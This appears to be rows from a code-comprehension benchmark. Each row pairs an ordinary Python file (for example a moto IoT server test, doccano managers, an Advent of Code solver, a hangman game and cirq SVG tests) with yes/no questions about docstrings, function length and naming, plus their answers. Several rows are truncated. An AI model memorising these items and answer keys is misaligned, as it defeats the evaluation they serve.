    Parametrised so the server is exercised with both a URL-encoded and a
    raw certificate ARN in the request path.
    """
    backend = server.create_backend_app("iot")
    test_client = backend.test_client()
    result = test_client.post("/keys-and-certificate?setAsActive=true")
    result_dict = json.loads(result.data.decode("utf-8"))
    certificate_arn = result_dict["certificateArn"]
    test_client.post("/policies/my-policy", json={"policyDocument": {}})
    test_client.put("/target-policies/my-policy", json={"target": certificate_arn})
    if url_encode_arn:
        certificate_arn = quote(certificate_arn, safe="")
    result = test_client.post("/attached-policies/{}".format(certificate_arn))
    result.status_code.should.equal(200)
    result_dict = json.loads(result.data.decode("utf-8"))
    result_dict["policies"][0]["policyName"].should.equal("my-policy")
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": tru... | 3 | tests/test_iot/test_server.py | oakbramble/moto |
from django.db.models import Count, Manager
class ExampleManager(Manager):
    """Manager whose bulk_create returns the saved rows in input order."""
    def bulk_create(self, objs, batch_size=None, ignore_conflicts=False):
        """Insert ``objs`` and return them re-fetched by uuid.

        The rows are re-read because the default bulk_create does not
        reliably populate primary keys on every backend.
        """
        super().bulk_create(objs, batch_size=batch_size, ignore_conflicts=ignore_conflicts)
        uuids = [data.uuid for data in objs]
        examples = self.in_bulk(uuids, field_name='uuid')
        return [examples[uid] for uid in uuids]
class ExampleStateManager(Manager):
    """Aggregations over per-example confirmation state."""
    def count_done(self, examples, user=None):
        """Number of distinct examples confirmed, optionally by ``user``."""
        if user:
            queryset = self.filter(example_id__in=examples, confirmed_by=user)
        else:
            queryset = self.filter(example_id__in=examples)
        return queryset.distinct().values('example').count()
    def measure_member_progress(self, examples, members):
        """Per-member confirmed counts plus the overall example total.

        Members with no confirmations are included with done=0.
        """
        done_count = self.filter(example_id__in=examples)\
            .values('confirmed_by__username')\
            .annotate(total=Count('confirmed_by'))
        response = {
            'total': examples.count(),
            'progress': [
                {
                    'user': obj['confirmed_by__username'],
                    'done': obj['total']
                } for obj in done_count
            ]
        }
        # Backfill zero counts for members absent from the aggregate.
        members_with_progress = {o['confirmed_by__username'] for o in done_count}
        for member in members:
            if member.username not in members_with_progress:
                response['progress'].append({
                    'user': member.username,
                    'done': 0
                })
        return response
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/... | 3 | backend/examples/managers.py | daobook/doccano |
#!/bin/python3
# Copyright (C) 2020 Matheus Fernandes Bigolin <mfrdrbigolin@disroot.org>
# SPDX-License-Identifier: MIT
"""Day Thirteen, Shuttle Search."""
from sys import argv
from re import findall
from utils import open_file, arrange, usage_and_exit, product
def solve1(buses, est):
    """Get the earliest bus from the <buses> according to the <est>imate
    time.  Returns its wait time multiplied by its bus id. """
    # The wait for bus b is b - est % b; min with a key keeps the first
    # minimal bus, matching the original index-based lookup.
    best = min(buses, key=lambda bus: bus - est % bus)
    return (best - est % best) * best
def solve2(buses, depart):
    """Find the smallest timestamp, such that all the <buses> follow their
    bus ID, which is indexically paired with <depart>.

    Uses the Chinese Remainder Theorem: the bus IDs are pairwise coprime,
    so a unique solution exists modulo the product of all ids. """
    # Stdlib replacement for the hand-rolled utils.product helper.
    from math import prod
    total = prod(buses)
    # Desired residue class for each bus.
    mods = [(b - d) % b for b, d in zip(buses, depart)]
    # CRT basis terms: product of all the *other* moduli for each bus.
    cross_mul = [total//b for b in buses]
    # pow(c, -1, b) is the modular inverse of c modulo b (Python 3.8+).
    return sum([c*pow(c, -1, b)*m for b, c, m
                in zip(buses, cross_mul, mods)]) % total
if __name__ == "__main__":
    usage_and_exit(len(argv) != 2)
    input_file = arrange(open_file(argv[1]))
    # Bus ids are every number on the second input line.
    bus_data = [int(b) for b in findall(r"\d+", input_file[1])]
    estimate = int(input_file[0])
    # Offsets (positions) of real buses; "x" placeholders are skipped.
    depart_data = [i for i,d in enumerate(findall(r"\w+", input_file[1]))
                   if d != "x"]
    print(solve1(bus_data, estimate))
    print(solve2(bus_data, depart_data))
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"... | 3 | src/day13.py | mfrdbigolin/AoC2020 |
import random
NUMBERS = ["1", "2", "3", "4", "5", "6", "7", "8", "9"]
def read_file(path="./archivos/data.txt"):
    """Return the word list, one word per line, newlines stripped.

    ``path`` defaults to the original data file, so existing zero-argument
    callers are unaffected; tests/other callers may point it elsewhere.
    """
    words = []
    with open(path, "r", encoding="utf-8") as f:
        for line in f:
            words.append(line.replace("\n", ""))
    return words
def random_word(words):
    """Pick one entry of ``words`` uniformly at random."""
    last_index = len(words) - 1
    return words[random.randint(0, last_index)]
def main():
    """Run one interactive hangman round in the console (Spanish UI)."""
    print("* - * - * - * - * - * - * - * - *- *- *")
    print("B I E N V E N I D O A H A N G M A N")
    print("* - * - * - * - * - * - * - * - *- *- *")
    print("\n")
    print("¡Adivina la palabra oculta!")
    tries = 0
    words = read_file()
    current_word = random_word(words)
    # One '-' placeholder per letter of the secret word.
    hidden_word = ['-' for i in current_word]
    print(hidden_word)
    try:
        while True:
            current_letter = input("Ingresa una letra: ")
            # Digits are rejected by raising to the outer handler below,
            # which prints the message and ends the round.
            for i in range(len(NUMBERS)):
                if current_letter == NUMBERS[i]:
                    raise ValueError("No ingreses números, solamente letras, por favor")
            # Collect every position where the guess matches.
            letter_indexes = []
            for idx in range(len(current_word)):
                if current_letter == current_word[idx]:
                    letter_indexes.append(idx)
            if len(letter_indexes) == 0:
                # Wrong guess: seven misses loses the round.
                tries += 1
                if tries == 7:
                    print(hidden_word)
                    print("")
                    print("¡Perdiste! La palabra correta era {}".format(current_word))
                    break
            else:
                # Reveal every occurrence of the guessed letter.
                for idx in letter_indexes:
                    hidden_word[idx] = current_letter
                print(hidden_word)
                letter_indexes = []
            try:
                # No '-' left means the whole word has been revealed.
                hidden_word.index("-")
            except ValueError:
                print("¡Ganaste! La palabra era {}".format(current_word))
                break
    except ValueError as ve:
        print(ve)
if __name__ == "__main__":
    main()
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": fal... | 3 | hangman.py | KevinCardenasDev/PythonIntermedio |
import abc
class WriterBase(abc.ABC):
    """Abstract producer side of a parallel pipe."""
    @abc.abstractmethod
    def set_pipe(self, pipe):
        """Attach the pipe this writer feeds."""
        pass
    @abc.abstractmethod
    def parallel_write_end_loop(self) -> None:
        """Run the writer's end-of-stream loop."""
        pass
    @abc.abstractmethod
    def is_running(self):
        """Return whether the writer is currently running."""
        pass
    @abc.abstractmethod
    def is_stopped(self):
        """Return whether the writer has stopped."""
        pass
    @abc.abstractmethod
    def start_running(self):
        """Transition the writer into its running state."""
        pass
    @abc.abstractmethod
    def __call__(self):
        """Entry point invoked by the executing worker."""
        pass
class ReaderBase(abc.ABC):
    """Abstract consumer side of a parallel pipe."""
    @abc.abstractmethod
    def set_pipe(self, pipe):
        """Attach the pipe this reader drains."""
        pass
    @abc.abstractmethod
    def is_running(self):
        """Return whether the reader is currently running."""
        pass
    @abc.abstractmethod
    def is_stopped(self):
        """Return whether the reader has stopped."""
        pass
    @abc.abstractmethod
    def start_running(self):
        """Transition the reader into its running state."""
        pass
    @abc.abstractmethod
    def __call__(self):
        """Entry point invoked by the executing worker."""
        pass
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer"... | 3 | process_exec/parallel_pipe_io_base.py | sreramk/dag_process_exec |
from flask import session, redirect, url_for
from functools import wraps
def login_required(f):
    """View decorator: bounce anonymous users to the auth.login page."""
    @wraps(f)
    def decorated_function(*args, **kwargs):
        if session.get("_user_id") is not None:
            return f(*args, **kwargs)
        return redirect(url_for("auth.login"))
    return decorated_function
| [
{
"point_num": 1,
"id": "any_function_over_40_lines",
"question": "Is any function in this file longer than 40 lines?",
"answer": false
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answe... | 3 | caishen_dashboard/auth/utils.py | Kerem-Sami-Coop/caishen-dashboard-be2 |
# coding: utf-8
# Copyright (c) 2015 Fabian Barkhau <fabian.barkhau@gmail.com>
# License: MIT (see LICENSE file)
from gravur.common.abstractscrollview import AbstractScrollView
from gravur.contacts.contactpreview import ContactPreview
from gravur.utils import load_widget
@load_widget
class ContactScrollView(AbstractScrollView):
    """Scrollable list of contact previews (kv layout bound by @load_widget)."""
    def __init__(self, *args, **kwargs):
        # TODO get entries from btctxstore
        # Placeholder data: 100 copies of one fixed txid.
        id = 'e30fa138367bc73b2174f54bd4cf307521ba26fe91539e0a77e22d3dd2cdbc03'
        entries = [{'txid': id} for i in range(100)]
        kwargs.update({ 'spacing': 5, 'entries': entries })
        super(ContactScrollView, self).__init__(*args, **kwargs)
    def entry_to_widget(self, entry):
        """Build the preview widget for one entry dict."""
        return ContactPreview(**entry)
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},... | 3 | gravur/contacts/contactscrollview.py | F483/gravur |
from binary_search import binary_search
# import pytest
def test_binary_search_with_valid_input_in_list():
    '''
    tests array with a valid case of the search key being in the array
    '''
    assert binary_search([1,2,3,4,5,6,7], 6) == 5
def test_binary_search_with_valid_but_not_included_input_in_list():
    '''
    tests array with a valid case of the search key not being in the array,
    returning -1
    '''
    assert binary_search([1,2,3,4,5,6,7], 10) == -1
def test_binary_search_with_empty_list():
    '''
    tests array with a valid case of an empty array (returns -1)
    '''
    assert binary_search([], 1) == -1
| [
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answ... | 3 | challenges/binary-search/test_binary_search.py | tyler-fishbone/data-structures-and-algorithms |
# -*- coding: utf-8 -*-
"""
bilibili user
~~~~~~~~~~~~~
Target site: www.bilibibli.com
Spider description: crawls bilibili user profile information
Example link: https://space.bilibili.com/33683045/
API format:
Example APIs:
    user info     - https://api.bilibili.com/x/space/acc/info?mid=26019347&jsonp=jsonp
    favourites    - https://api.bilibili.com/medialist/gateway/base/created?pn=1&ps=10&up_mid=26019347&jsonp=jsonp
    bangumi subs  - https://space.bilibili.com/ajax/Bangumi/getList?mid=26019347
    tag subs      - https://space.bilibili.com/ajax/tags/getSubList?mid=26019347
    live room     - https://api.live.bilibili.com/room/v1/Room/getRoomInfoOld?mid=26019347
Anti-crawling strategy: (none documented)
Data format: (unspecified)
Data fields: (unspecified)
"""
import scrapy
from scrapy.crawler import CrawlerProcess
class BilibiliUserSpider(scrapy.Spider):
    """Spider stub for the bilibili user-info API; parse() not implemented."""
    name = 'bilibili_user'
    allowed_domains = ['space.bilibili.com']
    start_urls = ['https://api.bilibili.com/x/space/acc/info?mid=26019347&jsonp=jsonp']
    def parse(self, response):
        # TODO: extract user fields from the JSON response.
        pass
#ITEM_PIPELINES = {
#    'crawler.pipelines.CrawlerPipeline': 300,
#}
#SPIDER_MIDDLEWARES = {
#    'crawler.middlewares.CrawlerSpiderMiddleware': 543,
#}
#DOWNLOADER_MIDDLEWARES = {
#    'crawler.middlewares.CrawlerDownloaderMiddleware': 543,
#}
# Crawler settings; the commented entries above can be re-enabled here.
settings = dict(
    # ITEM_PIPELINES=ITEM_PIPELINES,
    # SPIDER_MIDDLEWARES=SPIDER_MIDDLEWARES,
    # DOWNLOADER_MIDDLEWARES=DOWNLOADER_MIDDLEWARES,
)
def main():
    """Run the spider in-process with the (currently empty) settings."""
    process = CrawlerProcess(settings)
    process.crawl(BilibiliUserSpider)
    process.start()
if __name__ == "__main__":
    main()
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"ans... | 3 | dev/bilibili_user.py | lin-zone/crawler-dev |
# coding: utf-8
"""
Seldon Deploy API
API to interact and manage the lifecycle of your machine learning models deployed through Seldon Deploy. # noqa: E501
OpenAPI spec version: v1alpha1
Contact: hello@seldon.io
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import seldon_deploy_sdk
from seldon_deploy_sdk.models.volume import Volume # noqa: E501
from seldon_deploy_sdk.rest import ApiException
class TestVolume(unittest.TestCase):
    """Volume unit test stubs (generated by swagger-codegen)."""
    def setUp(self):
        # No fixtures required for the generated stub.
        pass
    def tearDown(self):
        pass
    def testVolume(self):
        """Test Volume"""
        # FIXME: construct object with mandatory attributes with example values
        # model = seldon_deploy_sdk.models.volume.Volume()  # noqa: E501
        pass
if __name__ == '__main__':
    unittest.main()
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
}... | 3 | python/test/test_volume.py | adriangonz/seldon-deploy-sdk |
from .table import Table
from .database import Database
class View(Table):
    """A database view: a Table variant that carries its defining SQL."""

    def __init__(self, db: Database, schema: str, name: str, view_def: str) -> None:
        self.viewDefinition = None
        super().__init__(db, schema, name)
        self.set_view_definition(view_def)

    def set_view_definition(self, view_definition: str):
        """Store the definition unless it is None or blank."""
        if view_definition is None:
            return
        if not view_definition.strip():
            return
        self.viewDefinition = view_definition

    def get_view_definition(self):
        """Return the stored view SQL (None when never set)."""
        return self.viewDefinition

    def is_view(self):
        """Views report True, unlike plain tables."""
        return True
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inherit... | 3 | dataprep/eda/create_db_report/db_models/view.py | devinllu/dataprep |
from functools import wraps
from typing import Callable, TypeVar
from graphene import ResolveInfo
from typing_extensions import Concatenate, ParamSpec
# Type variables: R_fn is the wrapped resolver's return type; P captures
# its remaining parameters so the decorator stays fully typed.
R_f = TypeVar("R_f")
R_fn = TypeVar("R_fn")
P = ParamSpec("P")
def context(fn: Callable[Concatenate[ResolveInfo, P], R_fn]) -> Callable[P, R_fn]:
    """
    Injects the context parameter into the wrapped function fn.
    Parameters
    ----------
    fn : Callable[Concatenate[ResolveInfo, P], R_fn]
        The function to wrap.
    Returns
    -------
    Callable[P, R_fn]
        The wrapped function with context injected.
    """
    @wraps(fn)
    def wrapper(*args: P.args, **kwargs: P.kwargs) -> R_fn:
        # Locate the graphene ResolveInfo among the resolver args and pass
        # its request context as the first argument to ``fn``.
        info = next(arg for arg in args if isinstance(arg, ResolveInfo))
        return fn(info.context, *args, **kwargs)
    return wrapper
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": false
},
{
"point_num": 2,
"id": "all_return_types_annotated",
"question": "Does every function in this file have a return type annotation?",
"a... | 3 | backend/decorators/helpers.py | hovedstyret/indok-web |
from celery.loaders.base import BaseLoader
class AppLoader(BaseLoader):
    """Celery loader for app-based setup (configuration supplied in code)."""
    def on_worker_init(self):
        # Import the default task modules when the worker starts.
        self.import_default_modules()
    def read_configuration(self):
        # App-based setup provides config programmatically; nothing to read.
        return {}
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
}... | 3 | celery/loaders/app.py | frac/celery |
import json, os
from position import Pos
class Loader:
    """Loads player placements for a map from data/<id>.json.

    NOTE(review): relies on ``self.new_player`` being provided elsewhere
    (subclass/mixin) -- it is not defined in this file; confirm with callers.
    """

    def __init__(self, id):
        file_name = str(id) + ".json"
        path = os.path.dirname(__file__)
        path_json = os.path.join(path, "data", file_name)
        # FIX: use a context manager so the file handle is closed even when
        # json.load raises (the original never closed it).  Also avoid
        # shadowing the builtin ``dict``.
        with open(path_json) as file:
            data = json.load(file)
        players = data["players"]
        for t, team in enumerate(players):
            for player in team:
                self.parse_player(t + 1, player)  # team numbers are 1-based

    def parse_player(self, team, element):
        """Create one player from its JSON dict ({"id": ..., "coord": ...})."""
        id = element["id"]
        coord = element["coord"]
        pos = Pos(coord)
        self.new_player(pos, int(id), team)
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
}... | 3 | src/map/loader.py | paoli7612/Elements |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
class UpdateImageAttributeRequest(RpcRequest):
    """RPC request for faas UpdateImageAttribute (API version 2017-08-24).

    Generated accessor pairs below map each query parameter of the call;
    camelCase names follow the SDK's generated-code convention.
    """
    def __init__(self):
        RpcRequest.__init__(self, 'faas', '2017-08-24', 'UpdateImageAttribute')
        self.set_method('POST')
    def get_Name(self):
        return self.get_query_params().get('Name')
    def set_Name(self,Name):
        self.add_query_param('Name',Name)
    def get_Description(self):
        return self.get_query_params().get('Description')
    def set_Description(self,Description):
        self.add_query_param('Description',Description)
    def get_FpgaImageUUID(self):
        return self.get_query_params().get('FpgaImageUUID')
    def set_FpgaImageUUID(self,FpgaImageUUID):
        self.add_query_param('FpgaImageUUID',FpgaImageUUID)
    def get_callerUid(self):
        return self.get_query_params().get('callerUid')
    def set_callerUid(self,callerUid):
        self.add_query_param('callerUid',callerUid)
    def get_Tags(self):
        return self.get_query_params().get('Tags')
    def set_Tags(self,Tags):
        self.add_query_param('Tags',Tags)
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": false
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer":... | 3 | aliyun-python-sdk-faas/aliyunsdkfaas/request/v20170824/UpdateImageAttributeRequest.py | liumihust/aliyun-openapi-python-sdk |
from typing import AbstractSet, Any, Mapping, Optional
def stringify(self_: Any, use: Optional[Mapping[str, Any]] = None, hide: Optional[AbstractSet[str]] = None) -> str:
    """Render *self_* as ``ClassName(field: repr, ...)``.

    ``use`` supplies replacement values for selected fields; ``hide`` lists
    field names to omit. Leading underscores in field names are stripped.
    """
    class_name = type(self_).__name__
    rendered_fields = _stringify_state(self_.__dict__, use or {}, hide or set())
    return f'{class_name}({rendered_fields})'
def _stringify_state(current_state: Mapping[str, Any],
                     custom_field_repr: Mapping[str, Any],
                     hidden_fields: AbstractSet[str]) -> str:
    """Join ``key: repr(value)`` pairs for all non-hidden fields.

    Keys from *custom_field_repr* override those from *current_state*;
    every key (and each hidden-field name) has leading underscores removed
    before comparison and display.
    """
    hidden = {_strip_qualifiers(name) for name in hidden_fields}
    merged = {_strip_qualifiers(key): value for key, value in current_state.items()}
    merged.update({_strip_qualifiers(key): value for key, value in custom_field_repr.items()})
    pairs = (f'{key}: {value!r}' for key, value in merged.items() if key not in hidden)
    return ', '.join(pairs)
def _strip_qualifiers(value: str) -> str:
return value.lstrip('_')
| [
{
"point_num": 1,
"id": "all_return_types_annotated",
"question": "Does every function in this file have a return type annotation?",
"answer": true
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
... | 3 | cmaj/utils/stringify.py | marianwieczorek/cmaj |
import LL1
class Node(LL1.Node):
    """Singly linked list node extending ``LL1.Node`` with index-based deletion."""

    def delete(self, k):
        """Remove the node at zero-based index *k* and return the resulting head.

        Returns None for a negative *k*. For k == 0 the head itself is
        dropped and the second node becomes the head. An out-of-range *k*
        leaves the list unchanged.
        """
        if k < 0:
            return None
        if k == 0:
            # Dropping the head: the rest of the list is the new head.
            return self.next
        current = self
        index = 1
        while current.next is not None:
            if index == k:
                # Unlink the k-th node by skipping over it.
                current.next = current.next.next
                break
            index += 1
            current = current.next
        return self
# Testing Area
class Product:
    """Minimal value object used by the test code below; holds only a name."""

    def __init__(self, name):
        self.name = name
if __name__ == "__main__":
    # Build the list 0 -> 1 -> 2 -> 3.
    ll = Node(0)
    ll.next = Node(1)
    ll.next.next = Node(2)
    ll.next.next.next = Node(3)
    # Bug fix: delete(-1) returns None for an invalid index, so the
    # original unconditional node1.transverse() crashed with
    # AttributeError and the final ll.transverse() never ran.
    node1 = ll.delete(-1)
    if node1 is not None:
        node1.transverse()
    ll.transverse()
{
"point_num": 1,
"id": "every_class_has_docstring",
"question": "Does every class in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
... | 3 | LL4.py | Am4teur/LinkedList |
# automatically generated by the FlatBuffers compiler, do not modify
# namespace: MNN
import flatbuffers
class Plugin(object):
    """FlatBuffers read accessor for the generated MNN ``Plugin`` table.

    Wraps a byte buffer and decodes fields lazily on access; no data is
    copied out of the buffer. Generated code — do not hand-edit logic.
    """
    __slots__ = ['_tab']
    @classmethod
    def GetRootAsPlugin(cls, buf, offset):
        # Read the root table's offset stored at `offset`, then position a
        # fresh accessor at that table.
        n = flatbuffers.encode.Get(flatbuffers.packer.uoffset, buf, offset)
        x = Plugin()
        x.Init(buf, n + offset)
        return x
    # Plugin
    def Init(self, buf, pos):
        # Bind this accessor to the table located at `pos` inside `buf`.
        self._tab = flatbuffers.table.Table(buf, pos)
    # Plugin: `type` string field (vtable slot 4); None when absent.
    def Type(self):
        o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(4))
        if o != 0:
            return self._tab.String(o + self._tab.Pos)
        return None
    # Plugin: j-th element of the `attr` vector (vtable slot 6); None when
    # the vector is absent. Each element is an indirect Attribute table.
    def Attr(self, j):
        o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(6))
        if o != 0:
            x = self._tab.Vector(o)
            # Elements are 4-byte offsets; step to the j-th one.
            x += flatbuffers.number_types.UOffsetTFlags.py_type(j) * 4
            x = self._tab.Indirect(x)
            from .Attribute import Attribute
            obj = Attribute()
            obj.Init(self._tab.Bytes, x)
            return obj
        return None
    # Plugin: length of the `attr` vector; 0 when the vector is absent.
    def AttrLength(self):
        o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(6))
        if o != 0:
            return self._tab.VectorLen(o)
        return 0
# Module-level builder helpers (FlatBuffers convention): call PluginStart,
# then the Add*/StartVector helpers as needed, then PluginEnd.
# Begin a Plugin table with 2 fields (type, attr).
def PluginStart(builder): builder.StartObject(2)
# Slot 0: offset of the `type` string.
def PluginAddType(builder, type): builder.PrependUOffsetTRelativeSlot(0, flatbuffers.number_types.UOffsetTFlags.py_type(type), 0)
# Slot 1: offset of the `attr` vector.
def PluginAddAttr(builder, attr): builder.PrependUOffsetTRelativeSlot(1, flatbuffers.number_types.UOffsetTFlags.py_type(attr), 0)
# Each `attr` element is a 4-byte offset, 4-byte aligned.
def PluginStartAttrVector(builder, numElems): return builder.StartVector(4, numElems, 4)
# Finish the table and return its offset.
def PluginEnd(builder): return builder.EndObject()
| [
{
"point_num": 1,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self... | 3 | pymnn/pip_package/MNN/tools/mnn_fb/Plugin.py | xhuan28/MNN |
import numpy as np
from .provider import BaseProvider
from pathlib import Path
from torch import is_tensor
class AudioProvider(BaseProvider):
    """Data provider for the audio modality."""

    def __init__(self, *args, **kwargs):
        # Set the modality before delegating, in case BaseProvider's
        # initialisation reads self.modality (assumed — confirm in base).
        self.modality = 'audio'
        super().__init__(*args, **kwargs)

    def process_input(self, data, labels):
        """Audio requires no extra preprocessing; return inputs unchanged."""
        return data, labels
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answe... | 3 | end2you/data_provider/audio_provider.py | tfyd/myEnd2you |
import sort_utils
def mergeTwoSorted(array1, array2):
    """Merge two sorted lists into a new sorted list.

    Stable: on ties, elements from *array1* come first. Neither input is
    modified.
    """
    merged = []
    i = j = 0
    len1, len2 = len(array1), len(array2)
    while i < len1 and j < len2:
        if array1[i] <= array2[j]:
            merged.append(array1[i])
            i += 1
        else:
            merged.append(array2[j])
            j += 1
    # At most one of these slices is non-empty; it is already sorted.
    merged.extend(array1[i:])
    merged.extend(array2[j:])
    return merged
def mergeSort(array):
    """Return a new sorted list via top-down merge sort; input is untouched."""
    if len(array) < 2:
        return array
    mid = len(array) // 2
    left = mergeSort(array[:mid])
    right = mergeSort(array[mid:])
    return mergeTwoSorted(left, right)
# TESTS — run on import against the shared fixtures in sort_utils.
sorted_ints = mergeSort(sort_utils.unsortedInts)
assert sorted_ints == sort_utils.sortedInts
print(sorted_ints)
sorted_floats = mergeSort(sort_utils.unsortedFloats)
assert sorted_floats == sort_utils.sortedFloats
print(sorted_floats)
# Degenerate inputs: empty and single-element lists are already sorted.
assert mergeSort([]) == []
assert mergeSort([2]) == [2]
| [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside... | 3 | tests_sort/05_30/merge_sort.py | pfreese/py_test |
import unittest
from localstack.utils.tagging import TaggingService
class TestTaggingService(unittest.TestCase):
    """Unit tests for localstack's TaggingService."""

    def setUp(self):
        # Fixed: the original shared one TaggingService as a *class*
        # attribute, so tags applied in one test leaked into the others and
        # results depended on test execution order. Create a fresh service
        # per test instead.
        self.svc = TaggingService()

    def test_list_empty(self):
        """Listing tags for an unknown resource yields an empty tag list."""
        result = self.svc.list_tags_for_resource("test")
        self.assertEqual({"Tags": []}, result)

    def test_create_tag(self):
        """A tagged resource reports exactly the tags that were applied."""
        tags = [{"Key": "key_key", "Value": "value_value"}]
        self.svc.tag_resource("arn", tags)
        actual = self.svc.list_tags_for_resource("arn")
        expected = {"Tags": [{"Key": "key_key", "Value": "value_value"}]}
        self.assertDictEqual(expected, actual)

    def test_delete_tag(self):
        """Untagging removes a previously applied tag."""
        tags = [{"Key": "key_key", "Value": "value_value"}]
        self.svc.tag_resource("arn", tags)
        self.svc.untag_resource("arn", ["key_key"])
        result = self.svc.list_tags_for_resource("arn")
        self.assertEqual({"Tags": []}, result)

    def test_list_empty_delete(self):
        """Untagging a resource that has no tags is a harmless no-op."""
        self.svc.untag_resource("arn", ["key_key"])
        result = self.svc.list_tags_for_resource("arn")
        self.assertEqual({"Tags": []}, result)
| [
{
"point_num": 1,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
... | 3 | tests/unit/test_tagging.py | jorges119/localstack |
import pytest
import numpy as np
import cirq
from cirq.contrib.svg import circuit_to_svg
def test_svg():
    """A circuit mixing 2-qubit, parameterized, matrix and measure gates renders to SVG."""
    q0, q1, q2 = cirq.LineQubit.range(3)
    circuit = cirq.Circuit(
        cirq.CNOT(q0, q1),
        cirq.CZ(q1, q2),
        cirq.SWAP(q0, q2),
        cirq.PhasedXPowGate(exponent=0.123, phase_exponent=0.456).on(q2),
        cirq.Z(q0),
        cirq.measure(q0, q1, q2, key='z'),
        cirq.MatrixGate(np.eye(2)).on(q0),
    )
    svg_text = circuit_to_svg(circuit)
    # Sanity check: output is a complete <svg>...</svg> document.
    assert '<svg' in svg_text
    assert '</svg>' in svg_text
def test_svg_noise():
    """Noise channels injected by a noise model show up in the rendered SVG."""
    qubit = cirq.LineQubit(0)
    noise_model = cirq.ConstantQubitNoiseModel(cirq.DepolarizingChannel(p=1e-3))
    base = cirq.Circuit(cirq.X(qubit))
    noisy = cirq.Circuit(noise_model.noisy_moments(base.moments, [qubit]))
    svg = circuit_to_svg(noisy)
    # The depolarizing channel should be labelled with its probability.
    assert '>D(0.001)</text>' in svg
def test_validation():
    """circuit_to_svg rejects empty circuits and circuits with empty moments."""
    with pytest.raises(ValueError):
        circuit_to_svg(cirq.Circuit())
    qubit = cirq.LineQubit(0)
    has_empty_moment = cirq.Circuit([
        cirq.Moment([cirq.X(qubit)]),
        cirq.Moment([]),
    ])
    with pytest.raises(ValueError):
        circuit_to_svg(has_empty_moment)
| [
{
"point_num": 1,
"id": "all_function_names_snake_case",
